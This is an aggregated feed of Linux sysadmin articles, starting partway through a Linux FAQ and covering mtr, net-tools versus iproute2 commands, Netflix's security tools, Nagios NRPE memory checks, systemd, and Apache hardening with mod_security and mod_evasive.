Linux at the point of use is free. Now many people would say that because Windows came with the computer they are using it is also free. With Windows everything costs money. You buy the computer and the Windows fee is already included. Then you have to pay for the antivirus subscription. If you want to use an office suite you have to pay for it.

Also consider about what happens when something goes wrong with Windows. Can you fix it? How much is it going to cost for you to get it fixed? With Linux there is such a great community and support network that you can probably fix most problems for free and you don't have to worry whether you lost the disks that came with your computer because you can create them again for free.

It is unfair to do a ying without a yang and so whilst searching on Why Linux I noticed that second on the list is "Why linux sucks".

Nobody answers this question better than Brian Lunduke
















2. Can Linux Read NTFS?

NTFS is the native Windows file system and has been for quite some time.

Can linux read NTFS?

I can prove this one by example. The computer I am using is running Windows 8 and Linux Mint 17. If I open up the Nemo file manager I am able to see the Windows 8 partition.

As you can see from the image above I am able to access the files and folders in the Windows partition formatted to NTFS and I can open photos, music, documents etc.

The answer to the question is therefore yes you can.

A better question might have been "how safe is it to write to NTFS partitions using Linux".

3. Can Linux Get Viruses?

Every operating system can catch a virus but a better thing to consider is the purpose of a virus.

Malware comes in many different forms and the aim of malware is to either extract money or to cause chaos. In order to do either the reach of the malware has to be wide spread.

To get one person on one computer to run an application to install Cryptolocker
will earn the reward of one person paying the ransom. In order to make real money the people spreading ransomware need to get as many people as possible to install it.

Why are there more burglaries in city centres than in country villages? It is easier to burgle a number of properties in close proximity than go from village to village and do one house at a time.
Real life viruses spread in the places that are most populated and with the least protection against that virus.

The same can be said for computer viruses. Windows has the larger userbase and so it is easier and more profitable to create viruses for Windows.

People using Linux for the first time are more likely to stick with installing applications via the package managers and by following guides from recognised sources. These users are unlikely to contract any sort of virus as the package managers are kept clean by the wider community.

Long term Linux users are technically savvy and therefore ultimately less likely to install a virus and even if they do they can probably fix the damage caused anyway and therefore there is little point targeting them.

The biggest danger to new Linux users is following instructions on websites that give false information. Entering commands into a terminal window without fully understanding the commands is potentially very dangerous.

4. Can Linux Run Windows Games?

Linux can do better than run Windows games, Linux can run Linux games as well.

This question therefore also incorporates "Can Linux Run Games?" and "Can Linux Run Steam?"

Steam has over 500 games available for the Linux platform and GOG.com have started releasing games with full Linux support


There are native Linux games as well. I wrote an article a while back discussing the games installed with the KDE desktop.

Are there any Minecraft players out there? You can play Minecraft using Linux as well.

To answer the actual question, Windows games can be played using WINE and PlayOnLinux. A full article on WINE and gaming is coming up shortly.

5. Can Linux Replace Windows?

Can Linux replace Windows? Which version of Windows are you looking to replace?

For Windows 7 you can follow this guide to switch to Linux Mint.
For Windows XP you can follow this guide to switch to Lubuntu.

Like the Windows look but not the functionality? Follow this guide to switch to Zorin OS 9.

6. Can Linux Read exFAT?

What is exFAT?

exFAT (Extended File Allocation Table) is a Microsoftfile system optimized for flash drives.[3] It is proprietary and patented.[2]
exFAT can be used where the NTFS file system is not a feasible solution (due to data structure overhead), or where the file size limit of the standard FAT32 file system (that is, without FAT32+ extension[4]) is unacceptable.
Although the industry-standard FAT32 file system supports volumes up to 2 TiB, exFAT has been adopted by the SD Card Association as the default file system for SDXC cards larger than 32 GiB.
The above snippet was taken from Wikipedia. exFAT appears to be the file system used on large USB drives and SD cards.

The answer to the question is yes. Linux can read exFAT partitions. You will need to install exfat-fuse and exfat-utils. (See here for details).

7. Can Linux run exe?

Linux works in a different way to Windows. Files with the .exe extension are executable programs in Windows, they have no meaning in Linux.

In Linux programs are installed via a package manager and are stored as binary files. You can start a program in most versions of Linux by double clicking it or by running it via the command line.

Simply downloading and double clicking an "exe" file in Linux will not work. If you have WINE installed it is possible to run executable files.

8. Can Linux Run On Mac?

It is possible to get Linux to run on Macs and I have written a guide showing how to dual boot Linux Mint and OSx on a MacBook Air.

This article appears if you ask the same question in Google and there is a really detailed response by someone who has tried Debian and Arch.

The MacBook Air internet connection issue has been solved in my article above but the other points raised are worth thinking about.

I am not a big Mac fan so maybe you can provide your experiences with running Linux on a Mac in the comments below.

9. Can Linux Run Windows Applications?

I feel like I am covering this question to death. The answer is yes (and no). Using WINE it is possible to run many Windows applications and in a lot of cases the applications run perfectly well.

An application designed for Windows will probably never work quite as well on Linux as it does for Windows because it wasn't built for the Linux architecture and you are relying 100% on WINE.

The simplest solution is to either find a good alternative (and believe me there are loads of great alternatives for most Windows applications) or try out the application in WINE to see how well it works.

Another alternative is to dual boot Windows and Linux or run Windows in a virtual machine for the odd piece of software that you need that requires Windows use.








10. Which Linux Distro?

This is the question that I get asked most every single day. Which Linux distro is best on this machine or which Linux distro is best on that machine?

Choosing a Linux distribution is a personal thing. I recommend trying a few out in virtual machines or as live distributions and then decide which Linux version suits you the best.

I recently ran a series of articles designed to help in this quest:
I have added to that series by producing an article for linux.about.com.
Here are a couple of articles for those of you looking to put Linux on a netbook:
  

Bonus Question. What Does Linux Look Like?

That is an almost impossible question to answer. I did say almost. Linux can be made to look however you want it to look.

I have a Pinterest page that has a selection of the wallpapers and images that have appeared on this site over the past few years.

Summary

The Google search tool throws up some interesting questions and the 10 that I answered just scratched the surface.

Just by adding an extra letter after the search term brings up new results. For instance "Why Linux a" brings up "Why Linux Ate My Ram" and "Why Linux Arch". The search tool also throws up some fairly bad grammar such as "why linux are better than windows".

I will be looking at Linux gaming over the next week including purpose built gaming distros, games emulators, STEAM and PlayOnLinux.

Thankyou for reading.

Unix: Better network connection insights with mtr

$
0
0
http://www.itworld.com/operating-systems/433991/unix-better-network-connection-insights-mtr

Traceroute is still a great tool, but mtr ("my traceroute") provides even more insights when you're looking into network routing problems.

The mtr tool -- "my traceroute", originally "Matt's traceroute" for the guy that first developed it (Matt Kimball in 1997) -- is in some ways like a combination of traceroute and ping and it provides a lot more data than the two of these commands combined.
Like ping and traceroute, mtr uses icmp packets to test connections. While traceroute is likely to be installed on every Unix system you use, you may have to separately install mtr. If you do, here are some commands for doing so:
  • Ubuntu or Debian systems: apt-get install mtr
  • Fedora or Centos: yum install mtr
  • Mac OS X: brew install mtr
  • FreeBSD: pkg install net/mtr
Like traceroute, mtr uses TTLs (time to live values) so that it can report on each leg of a route individually. It does this by setting the TTL to 1, then 2, then 3 and so on. Each time, it collects the round trip time for the next leg of the trip to the remote system. When it sets the TTL to 2, for example, it gets the timing information for the second leg. At each connection, the router decrements the TTL by one (this is what routers always do). At the final device, it becomes 0 and the tracing goes no further. Instead, an "ICMP TTL exceeded" event occurs just it has once at each of the other devices, measurements for the last device are sent back to the source and the report is done.
The latency (round trip) measurement is the timestamp when ICMP reply is received minus the timestamp when the probe was launched.
By default, traceroute issues three probes aper hop, thus you will see three numbers for each hop in the traceroute output.
Here is some sample traceroute output:
$ traceroute world.pts.com
traceroute to world.pts.com (192.74.137.5), 30 hops max, 40 byte packets
1 pix (192.168.0.2) 0.255 ms 0.478 ms 0.443 ms
2 * * *
3 gig1-6.umcp-core.net.doz.org (136.160.255.33) 9.856 ms 9.343 ms 9.822 ms
4 ten2-0.stpaul-core.net.doz.org (136.160.255.198) 3.401 ms 3.858 ms 3.681 ms
5 te4-3.ccr01.bwi01.atlas.cogentco.com (38.104.12.17) 2.920 ms 2.859 ms 3.280 ms
6 te4-2.ccr01.phl01.atlas.cogentco.com (154.54.2.174) 5.965 ms 5.945 ms 5.920 ms
7 te0-0-0-7.ccr22.jfk02.atlas.cogentco.com (154.54.31.53) 9.084 ms te0-0-0-7.ccr21.
jfk02.atlas.cogentco.com (154.54.1.41) 8.811 ms te0-0-0-7.ccr22.jfk02.atlas.cogentco.
com (154.54.31.53) 8.784 ms
8 be2096.ccr22.bos01.atlas.cogentco.com (154.54.30.42) 14.991 ms be2094.ccr21.bos01
.atlas.cogentco.com (154.54.30.14) 14.764 ms be2096.ccr22.bos01.atlas.cogentco.com
(154.54.30.42) 14.964 ms
9 te4-1.mag02.bos01.atlas.cogentco.com (154.54.43.70) 14.478 ms te4-1.mag01.bos01.
atlas.cogentco.com (154.54.43.50) 14.201 ms 14.171 ms
10 gi0-0-0-0.nr11.b000502-0.bos01.atlas.cogentco.com (154.24.6.237) 14.891 ms 16
.941 ms 16.702 ms
11 cogent.bos.ma.towerstream.com (38.104.186.82) 14.699 ms 14.188 ms 14.220 ms
12 g6-2.cr.bos1.ma.towerstream.com (64.119.143.81) 14.904 ms 14.903 ms 14.888 ms
13 69.38.149.18 (69.38.149.18) 18.293 ms 34.857 ms 33.138 ms
14 64.119.137.154 (64.119.137.154) 33.122 ms 36.814 ms 36.329 ms
15 world.pts.com (192.74.137.15) 34.369 ms 34.567 ms 29.696 ms
The mtr command differs from traceroute in several ways. First, like top, it provides a table of values that refreshes itself every second or so, allowing you to see how the values are updated over time. You can slow this down by giving the command a -i or --interval argument and specify the seconds you want to pass between each update.
It also shows you the packet loss -- like ping.
The mtr command also shows you a number of statistics for each leg in the route. The columns in the output (see example below) represent:
  • Snt -- number of packets sent
  • Loss% -- percentage of packets lost at each hop (can change with --report-cycles=#
    where # is replaced by the number of packets you want to send
  • Last -- latency of the last packet sent
  • Avg -- average latency
  • Best -- shortest round trip
  • Wrst -- longest round trip
  • StDev -- standard deviation
Last, Avg, Best, and Wrst are all provided in milliseconds
                                My traceroute  [v0.71]
boson.xyz.org (0.0.0.0) Sun Aug 31 16
:22:55 2014
Keys: Help Display mode Restart statistics Order of fields quit
Packets Pings
Host Loss% Last Avg Best Wrst StDev
1. 192.168.0.1 50.0% 0.4 0.4 0.4 0.4 0.0
2. ???
3. gig1-6.umcp-core.net.doz.org 0.0% 1.6 4.0 1.6 6.6 2.5
4. ten2-0.stpaul-core.net.doz.org 0.0% 2.7 2.8 2.7 2.8 0.1
5. te4-3.ccr01.bwi01.atlas.cogentco.com 0.0% 91.5 32.3 2.7 91.5 51.2
6. te4-2.ccr01.phl01.atlas.cogentco.com 0.0% 5.6 11.6 5.6 23.4 10.2
7. te0-0-0-19.mpd21.jfk02.atlas.cogentco.com 0.0% 8.8 8.7 8.7 8.8 0.1
8. be2095.ccr21.bos01.atlas.cogentco.com 0.0% 14.5 14.4 14.3 14.5 0.1
9. te4-1.mag01.bos01.atlas.cogentco.com 0.0% 14.1 14.2 14.1 14.3 0.1
10. gi0-0-0-0.nr11.b000502-0.bos01.atlas.com 0.0% 14.7 14.6 14.6 14.7 0.1
11. cogent.bos.ma.towerstream.com 0.0% 14.1 14.1 14.1 14.1 0.1
12. g6-2.cr.bos1.ma.towerstream.com 0.0% 14.8 14.8 14.8 14.8 0.0
13. 69.38.149.18 0.0% 24.0 26.9 24.0 29.7 4.1
14. 64.119.137.154 0.0% 28.5 28.5 28.5 28.5 0.0
15. world.pts.com 0.0% 23.3 22.2 21.1 23.3 1.5
Another often used mtr command is to use the -r or --report command. This gives you a static report (rather than updating every second). Instead, it runs through 10 iterations (or whatever you tell it using the -c (count) or --report-cycles option and shows you the result at the end.
You can ask for a report using syntax like this:
mtr --report 
mtr --report
$ mtr world.pts.com --report
boson.xyz.org Snt: 10 Loss% Last Avg Best Wrst StDev
pix 50.0% 0.4 0.4 0.4 0.4 0.0
??? 100.0 0.0 0.0 0.0 0.0 0.0
gig1-6.umcp-core.net.doz.org 0.0% 12.6 4.0 1.5 12.6 3.6
ten2-0.stpaul-core.net.doz.org 0.0% 8.2 5.3 2.7 13.0 4.1
te4-3.ccr01.bwi01.atlas.cogentco.com 0.0% 2.9 33.4 2.6 139.2 52.1
te4-2.ccr01.phl01.atlas.cogentco.com 0.0% 5.7 52.9 5.5 201.2 74.9
te0-0-0-19.mpd21.jfk02.atlas.cogentco.com 0.0% 8.5 8.6 8.5 8.7 0.1
be2095.ccr21.bos01.atlas.cogentco.com 0.0% 14.4 14.6 14.3 15.0 0.2
te4-1.mag01.bos01.atlas.cogentco.com 0.0% 14.5 28.5 14.0 157.2 45.2
gi0-0-0-0.nr11.b000502-0.bos01.atlas.cogentc 0.0% 15.0 14.8 14.7 15.1 0.2
cogent.bos.ma.towerstream.com 0.0% 14.1 27.0 14.0 136.0 38.4
g6-2.cr.bos1.ma.towerstream.com 0.0% 15.9 15.0 14.8 15.9 0.3
69.38.149.18 0.0% 22.6 23.5 18.3 34.2 4.7
64.119.137.154 10.0% 23.0 25.4 19.6 32.0 4.7
world.pts.com 0.0% 21.9 23.7 19.2 29.9 3.6
Both packet loss and latency tell you a lot about the quality of your connections. A large loss will indicate a problem with the particular router. Note in the second line above, we see 100% loss. This router is not sending anything back to us, though this doesn't mean that it isn't a functional router. Obviously, the connections are reaching the final destination. But the router is probably not allowing icmp traffic to go back to the source or is taking too long. The ??? indicates timeouts. Some loss that you see may be due to rate limiting settings on routers.
Some people who use mtr routinely for troubleshooting network connections suggest that you run reports in both directions if you want to fully diagnose your connection issues.

Linux TCP/IP networking: net-tools vs. iproute2

$
0
0
http://xmodulo.com/2014/09/linux-tcpip-networking-net-tools-iproute2.html

Many sysadmins still manage and troubleshoot various network configurations by using a combination of ifconfig, route, arp and netstat command-line tools, collectively known as net-tools. Originally rooted in the BSD TCP/IP toolkit, the net-tools was developed to configure network functionality of older Linux kernels. Its development in the Linux community so far has ceased since 2001. Some Linux distros such as Arch Linux and CentOS/RHEL 7 have already deprecated net-tools in favor of iproute2.
iproute2, which is another family of network configuration tools, emerged to replace the functionality of net-tools. While net-tools accesses and changes kernel network configurations via procfs (/proc) and ioctl system call, iproute2 communicates with the kernel via netlink socket interface. The /proc interface is known to be more heavyweight than netlink interface. Putting performance aside, the user interface of iproute2 is more intuitive than that of net-tools. For example, network resources (e.g., link, IP address, route, tunnel, etc.) are aptly defined with "object" abstraction, and you can manage different objects using consistant syntax. Most importantly, iproute2 has been under active development so far.
If you are still using net-tools, it is time to switch to iproute2, especially if you want to catch up with the latest and greatest networking features of the latest Linux kernel. Chances are that there are many things you can do with iproute2, but cannot with net-tools.
For those who want to make the switch, here is a round-up of net-tools vs. iproute2 comparison.

Show All Connected Network Interfaces

The following commands show a list of all available network interfaces (whether or not they are active).
With net-tools:
$ ifconfig -a
With iproute2:
$ ip link show

Activate or Deactivate a Network Interface

To activate/deactivate a particular network interface, use these commands.
With net-tools:
$ sudo ifconfig eth1 up
$ sudo ifconfig eth1 down
With iproute2:
$ sudo ip link set down eth1
$ sudo ip link set up eth1

Assign IPv4 address(es) to a Network Interface

Use these commands to configure IPv4 addresses of a network interface.
With net-tools:
$ sudo ifconfig eth1 10.0.0.1/24
With iproute2:
$ sudo ip addr add 10.0.0.1/24 dev eth1
Note that with iproute2, you can assign multiple IP addresses to an interface, which you cannot do with ifconfig. A workaround for this with ifconfig is to use IP aliases.
$ sudo ip addr add 10.0.0.1/24 broadcast 10.0.0.255 dev eth1
$ sudo ip addr add 10.0.0.2/24 broadcast 10.0.0.255 dev eth1
$ sudo ip addr add 10.0.0.3/24 broadcast 10.0.0.255 dev eth1

Remove an IPv4 address from a Network Interface

As far as IP address removal is concerned, there is no proper way to remove an IPv4 address from a network interface with net-tools, other than assigning 0 to the interface. iproute2 can properly handle this.
With net-tools:
$ sudo ifconfig eth1 0
With iproute2:
$ sudo ip addr del 10.0.0.1/24 dev eth1

Show IPv4 Address(es) of a Network Interface

Checking IPv4 addresses of a particular network interface can be done as follows.
With net-tools:
$ ifconfig eth1
With iproute2:
$ ip addr show dev eth1
Again, if there are multiple IP addresses assigned to an interface, iproute2 shows all of them, while net-tools shows only one IP address.

Assign an IPv6 address to a Network Interface

Use these commands to add IPv6 address(es) to a network interface. Both net-tools and iproute2 allow you to add multiple IPv6 addresses to an interface.
With net-tools:
$ sudo ifconfig eth1 inet6 add 2002:0db5:0:f102::1/64
$ sudo ifconfig eth1 inet6 add 2003:0db5:0:f102::1/64
With iproute2:
$ sudo ip -6 addr add 2002:0db5:0:f102::1/64 dev eth1
$ sudo ip -6 addr add 2003:0db5:0:f102::1/64 dev eth1

Show IPv6 address(es) of a Network Interface

Displaying IPv6 addresses of a particular network interface can be done as follows. Both net-tools and iproute2 can show all assigned IPv6 addresses.
With net-tools:
$ ifconfig eth1
With iproute2:
$ ip -6 addr show dev eth1

Remove an IPv6 address from a Network Interface

Use these commands to remove any unnecessary IPv6 address from an interface.
With net-tools:
$ sudo ifconfig eth1 inet6 del 2002:0db5:0:f102::1/64
With iproute2:
$ sudo ip -6 addr del 2002:0db5:0:f102::1/64 dev eth1

Change the MAC Address of a Network Interface

To spoof the MAC address of a network interface, use the commands below. Note that before changing the MAC address, you need to deactivate the interface first.
With net-tools:
$ sudo ifconfig eth1 hw ether 08:00:27:75:2a:66
With iproute2:
$ sudo ip link set dev eth1 address 08:00:27:75:2a:67

View the IP Routing Table

net-tools has two options for showing the kernel's IP routing table: route or netstat. With iproute2, use ip route command.
With net-tools:
$ route -n
$ netstat -rn
With iproute2:
$ ip route show

Add or Modify a Default Route

Here are the commands to add or modify a default route in the kernel's IP routing table. Note that with net-tools, modifying a default route can be achieved by adding a new default route, and then removing an old default route. With iproute2, use ip route replace command.
With net-tools:
$ sudo route add default gw 192.168.1.2 eth0
$ sudo route del default gw 192.168.1.1 eth0
With iproute2:
$ sudo ip route add default via 192.168.1.2 dev eth0
$ sudo ip route replace default via 192.168.1.2 dev eth0

Add or Remove a Static Route

A static routing can be added or removed with the following commands.
With net-tools:
$ sudo route add -net 172.16.32.0/24 gw 192.168.1.1 dev eth0
$ sudo route del -net 172.16.32.0/24
With iproute2:
$ sudo ip route add 172.16.32.0/24 via 192.168.1.1 dev eth0
$ sudo ip route del 172.16.32.0/24

View Socket Statistics

Here are the commands to check socket statistics (e.g., active/listening TCP/UDP sockets).
With net-tools:
$ netstat
$ netstat -l
With iproute2:
$ ss
$ ss -l

View the ARP Table

You can display the kernel's ARP table with these commands.
With net-tools:
$ arp -an
With iproute2:
$ ip neigh

Add or Remove a Static ARP Entry

Adding or removing a static ARP entry in the local ARP table is done as follows.
With net-tools:
$ sudo arp -s 192.168.1.100 00:0c:29:c0:5a:ef
$ sudo arp -d 192.168.1.100
With iproute2:
$ sudo ip neigh add 192.168.1.100 lladdr 00:0c:29:c0:5a:ef dev eth0
$ sudo ip neigh del 192.168.1.100 dev eth0

Add, Remove or View Multicast Addresses

To configure or view multicast addresses on a network interface, use the commands below.
With net-tools:
$ sudo ipmaddr add 33:44:00:00:00:01 dev eth0
$ sudo ipmaddr del 33:44:00:00:00:01 dev eth0
$ ipmaddr show dev eth0
$ netstat -g
With iproute2:
$ sudo ip maddr add 33:44:00:00:00:01 dev eth0
$ sudo ip maddr del 33:44:00:00:00:01 dev eth0
$ ip maddr list dev eth0

Netflix open sources internal threat monitoring tools

$
0
0
http://www.networkworld.com/article/2599461/security/netflix-open-sources-internal-threat-monitoring-tools.html

Netflix has released three internal tools it uses to catch hints on the Web that hackers might target its services.
“Many security teams need to stay on the lookout for Internet-based discussions, posts and other bits that may be of impact to the organizations they are protecting,” wrote Andy Hoernecke and Scott Behrens of Netflix’s Cloud Security Team.
Featured Resource
Presented by Scribe Software
Data integration is often underestimated and poorly implemented, taking time and resources. Yet it
Learn More
+ Also on NetworkWorld:Best/Worst Apple iPhone 6 Design Concepts +
One of the tools, called Scumblr, can be used to create custom searches of Google sites, Twitter and Facebook for users or keywords. The searches can be set to run regularly or be done manually, they wrote.
Scumblr has a component called Workflowable that can be used to organize and prioritize the results. Workflowable has a plugin architecture that can be used to set custom triggers for automated actions, they wrote.
When something of interest is found on a website, another tool called Sketchy takes a screenshot.
“One of the features we wanted to see in Scumblr was the ability to collect screenshots and text content from potentially malicious sites,” they wrote. “This allows security analysts to preview Scumblr results without the risk of visiting the site directly.”
Scumblr, Sketchy and Workflowable have been released under open-source software licenses on GitHub.
To be sure, many sophisticated attackers keep their discussions of attacks on password-protected forums whose visitors are closely vetted by the site’s operators. But there are also many so-called “hacktivists” who are less discrete.
Often eager for publicity, those attackers will use social networking sites such as Twitter to brag or warn of their campaigns, which could be picked up quickly by Scumblr.

How to monitor server memory usage with Nagios Remote Plugin Executor (NRPE)

$
0
0
http://xmodulo.com/2014/09/monitor-server-memory-usage-nagios-remote-plugin-executor.html

In a previous tutorial, we have seen how we can set up Nagios Remote Plugin Executor (NRPE) in an existing Nagios setup. However, the scripts and plugins needed to monitor memory usage do not come with stock Nagios. In this tutorial, we will see how we can configure NRPE to monitor RAM usage of a remote server.
The script that we will use for monitoring RAM is available at Nagios Exchange, as well as the creators'Github repository.
Assuming that NRPE has already been set up, we start the process by downloading the script in the server that we want to monitor.

Preparing Remote Servers

On Debain/Ubuntu:
# cd /usr/lib/nagios/plugins/
# wget https://raw.githubusercontent.com/justintime/nagios-plugins/master/check_mem/check_mem.pl
# mv check_mem.pl check_mem
# chmod +x check_mem
On RHEL/CentOS:
# cd /usr/lib64/nagios/plugins/ (or /usr/lib/nagios/plugins/ for 32-bit)
# wget https://raw.githubusercontent.com/justintime/nagios-plugins/master/check_mem/check_mem.pl
# mv check_mem.pl check_mem
# chmod +x check_mem
You can check whether the script generates output properly by manually running the following command on localhost. When used with NRPE, this command is supposed to check free memory, warn when free memory is less than 20%, and generate critical alarm when free memory is less than 10%.
# ./check_mem -f -w 20 -c 10
OK - 34.0% (2735744 kB) free.|TOTAL=8035340KB;;;; USED=5299596KB;6428272;7231806;; FREE=2735744KB;;;; CACHES=2703504KB;;;;
If you see something like the above as an output, that means the command is working okay.
Now that the script is ready, we define the command to check RAM usage for NRPE. As mentioned before, the command will check free memory, warn when free memory is less than 20%, and generate critical alarm when free memory is less than 10%.
# vim /etc/nagios/nrpe.cfg
For Debian/Ubuntu:
1
command[check_mem]=/usr/lib/nagios/plugins/check_mem  -f -w 20 -c 10
For RHEL/CentOS 32 bit:
1
command[check_mem]=/usr/lib/nagios/plugins/check_mem  -f -w 20 -c 10
For RHEL/CentOS 64 bit:
1
command[check_mem]=/usr/lib64/nagios/plugins/check_mem  -f -w 20 -c 10

Preparing Nagios Server

In the Nagios server, we define a custom command for NRPE. The command can be stored in any directory within Nagios. To keep the tutorial simple, we will put the command definition in /etc/nagios directory.
For Debian/Ubuntu:
# vim /etc/nagios3/conf.d/nrpe_command.cfg
1
2
3
4
define command{
        command_name check_nrpe
        command_line /usr/lib/nagios/plugins/check_nrpe-H '$HOSTADDRESS$'  -c '$ARG1$'
}
For RHEL/CentOS 32 bit:
# vim /etc/nagios/objects/nrpe_command.cfg
1
2
3
4
define command{
        command_name check_nrpe
        command_line /usr/lib/nagios/plugins/check_nrpe-H $HOSTADDRESS$ -c $ARG1$
        }
For RHEL/CentOS 64 bit:
# vim /etc/nagios/objects/nrpe_command.cfg
1
2
3
4
define command{
        command_name check_nrpe
        command_line /usr/lib64/nagios/plugins/check_nrpe-H $HOSTADDRESS$ -c $ARG1$
        }
Now we define the service check in Nagios.
On Debian/Ubuntu:
# vim /etc/nagios3/conf.d/nrpe_service_check.cfg
1
2
3
4
5
6
define service{
        use                            local-service
        host_name                      remote-server
        service_description            Check RAM
        check_command                  check_nrpe!check_mem
}
On RHEL/CentOS:
# vim /etc/nagios/objects/nrpe_service_check.cfg
1
2
3
4
5
6
define service{
        use                            local-service
        host_name                      remote-server
        service_description            Check RAM
        check_command                  check_nrpe!check_mem
}
Finally, we restart the Nagios service.
On Debian/Ubuntu:
# service nagios3 restart
On RHEL/CentOS 6:
# service nagios restart
On RHEL/CentOS 7:
# systemctl restart nagios.service

Troubleshooting

Nagios should start checking RAM usage of a remote-server using NRPE. If you are having any problem, you could check the following.
  1. Make sure that NRPE port is allowed all the way to the remote host. Default NRPE port is TCP 5666.
  2. You could try manually checking NRPE operation by executing the check_nrpe command: /usr/lib/nagios/plugins/check_nrpe -H remote-server
  3. You could also try to run the check_mem command manually: /usr/lib/nagios/plugins/check_nrpe -H remote-server –c check_mem
  4. In the remote server, set debug=1 in /etc/nagios/nrpe.cfg. Restart the NRPE service and check the log file /var/log/messages (RHEL/CentOS) or /var/log/syslog (Debain/Ubuntu). The log files should contain relevant information if there is any configuration or permission errors. If there are not hits in the log, it is very likely that the requests are not reaching the remote server due to port filtering at some point.
To sum up, this tutorial demonstrated how we can easily tune NRPE to monitor RAM usage of remote servers. The process is as simple as downloading the script, defining the commands, and restarting the services. Hope this helps.

Colourful ! systemd vs sysVinit Linux Cheatsheet

$
0
0
http://linoxide.com/linux-command/systemd-vs-sysvinit-cheatsheet

systemd is the new init system, started with Fedora and now started adopted in many distributions like redhat, suse and centos. This long period we all been using traditional SysV init scripts usually residing in /etc/rc.d/init.d/ directory. These scripts invokes daemon binary which will then forks a background process. Even though shell scripts very are flexible buts other tasks like supervising processes and parallized execution ordering will be very hard to implement. With the introduction of systemd new-style daemons which makes easier to supervise and control them at runtime and simplifies their implementation.
systemctl command is a very good initiative in systemd that shows more detailed error condition and also runtime errors of services plus start-up errors. systemd have introduced a new term called cgroups (control groups) which is basically groups of process that can be arranged in a hierarchy. In init system which process does what and where it belongs to becomes increasingly difficult. When processes spawn other processes these children are automatically made members of the parents cgroup so it will avoid many confusions about inheritance.
systemd vs sysVinit cheatsheet
There are a lot of new systemd commands available on rhel / centos 7.0 version that would replace sysvinit commands. You can also download pdf version of the systemd vs sysvinit cheatsheet.

How to harden Apache web server with mod_security and mod_evasive on CentOS

$
0
0
 http://xmodulo.com/2014/09/harden-apache-web-server-mod_security-mod_evasive-centos.html

Web server security is a vast subject, and different people have different preferences and opinions as to what the best tools and techniques are to harden a particular web server. With Apache web server, a great majority of experts -if not all- agree that mod_security and mod_evasive are two very important modules that can protect an Apache web server against common threats.
In this article, we will discuss how to install and configure mod_security and mod_evasive, assuming that Apache HTTP web server is already up and running. We will perform a demo stress test to see how the web server reacts when it is under a denial-of-service (DOS) attack, and show how it fights back with these modules. We will be using CentOS platform in this tutorial.

Installing mod_security & mod_evasive

If you haven't enabled the EPEL repository in your CentOS/RHEL server, you need to do so before installing these packages.
# yum install mod_security
# yum install mod_evasive
After the installation is complete, you will find the main configuration files inside /etc/httpd/conf.d:

Now you need to make sure that Apache loads both modules when it starts. Look for the following lines (or add them if they are not present) in mod_security.conf and mod_evasive.conf, respectively:
1
2
LoadModule security2_module modules/mod_security2.so
LoadModule evasive20_module modules/mod_evasive20.so
In the two lines above:
  • The LoadModule directive tells Apache to link in an object file (*.so), and adds it to the list of active modules.
  • security2_module and evasive20_module are the names of the modules.
  • modules/mod_security2.so and modules/mod_evasive20.so are relative paths from the /etc/httpd directory to the source files of the modules. This can be verified (and changed, if necessary) by checking the contents of the /etc/httpd/modules directory.

Now restart Apache web server:
# service httpd restart

Configuring mod_security

In order to use mod_security, a Core Rule Set (CRS) must be installed first. Basically, a CRS provides a web server with a set of rules on how to behave under certain conditions. Trustwave's SpiderLabs (the firm behind mod_security) provides the OWASP (Open Web Application Security Project) ModSecurity CRS.
To download and install the latest OWASP CRS, use the following commands.
# mkdir /etc/httpd/crs
# cd /etc/httpd/crs
# wget https://github.com/SpiderLabs/owasp-modsecurity-crs/tarball/master
# tar xzf master
# mv SpiderLabs-owasp-modsecurity-crs-ebe8790 owasp-modsecurity-crs
Now navigate to the installed OWASP CRS directory.
# cd /etc/httpd/crs/owasp-modsecurity-crs
In the OWASP CRS directory, you will find a sample file with rules (modsecurity_crs_10_setup.conf.example).

We will copy its contents into a new file named (for convenience) modsecurity_crs_10_setup.conf.
# cp modsecurity_crs_10_setup.conf.example modsecurity_crs_10_setup.conf
To tell Apache to use this file for mod_security module, insert the following lines in the /etc/httpd/conf/httpd.conf file. The exact paths may be different depending on where you unpack the CRS tarball.
1
2
3
4
    Include crs/owasp-modsecurity-crs/modsecurity_crs_10_setup.conf
    Include crs/owasp-modsecurity-crs/base_rules/*.conf
</IfModule>
Last, but not least, we will create our own configuration file within the modsecurity.d directory where we will include our chosen directives. We will name this configuration file xmodulo.conf in this example. It is highly encouraged that you do not edit the CRS files directly but rather place all necessary directives in this configuration file. This will allow for easier upgrading as newer CRSs are released.
# vi /etc/httpd/modsecurity.d/xmodulo.conf
1
2
3
4
5
6
7
    SecRuleEngine On
    SecRequestBodyAccess On
    SecResponseBodyAccess On
    SecResponseBodyMimeType text/plaintext/htmltext/xmlapplication/octet-stream
    SecDataDir /tmp
</IfModule>
  • SecRuleEngine On: Use the OWASP CRS to detect and block malicious attacks.
  • SecRequestBodyAccess On: Enable inspection of data transported request bodies (e.g., POST parameters).
  • SecResponseBodyAccess On: Buffer response bodies (only if the response MIME type matches the list configured with SecResponseBodyMimeType).
  • SecResponseBodyMimeType text/plain text/html text/xml application/octet-stream: Configures which MIME types are to be considered for response body buffering. If you are unfamiliar with MIME types or unsure about their names or usage, you can check the Internet Assigned Numbers Authority (IANA) web site.
  • SecDataDir /tmp: Path where persistent data (e.g., IP address data, session data, and so on) is to be stored. Here persistent means anything that is not stored in memory, but on hard disk.
You can refer to the SpiderLabs' ModSecurity GitHub repository for a complete guide of configuration directives.
Don't forget to restart Apache to apply changes.

Configuring mod_evasive

The mod_evasive module reads its configuration from /etc/httpd/conf.d/mod_evasive.conf. As opposed to mod_security, we don't need a separate configuration file because there are no rules to update during a system or package upgrade.
The default mod_evasive.conf file has the following directives enabled:
1
2
3
4
5
6
7
8
    DOSHashTableSize    3097
    DOSPageCount        2
    DOSSiteCount        50
    DOSPageInterval     1
    DOSSiteInterval     1
    DOSBlockingPeriod   10
</IfModule>
  • DOSHashTableSize: The size of the hash table that is used to keep track of activity on a per-IP address basis. Increasing this number will provide a faster look up of the sites that the client has visited in the past, but may impact overall performance if it is set too high.
  • DOSPageCount: The number of identical requests to a specific URI (for example, a file that is being served by Apache) a visitor can make over the DOSPageInterval interval.
  • DOSSiteCount: similar to DOSPageCount, but refers to how many overall requests can be made to the site over the DOSSiteInterval interval.
  • DOSBlockingPeriod: If a visitor exceeds the limits set by DOSSPageCount or DOSSiteCount, he/she will be blacklisted for the DOSBlockingPeriod amount of time. During this interval, any requests coming from him/her will return a 403 Forbidden error.
You may want to change these values according to the amount and type of traffic that your web server needs to handle. Please note that if these values are not set properly, you may end up blocking legitimate visitors.
Here are other useful directives for mod_evasive:
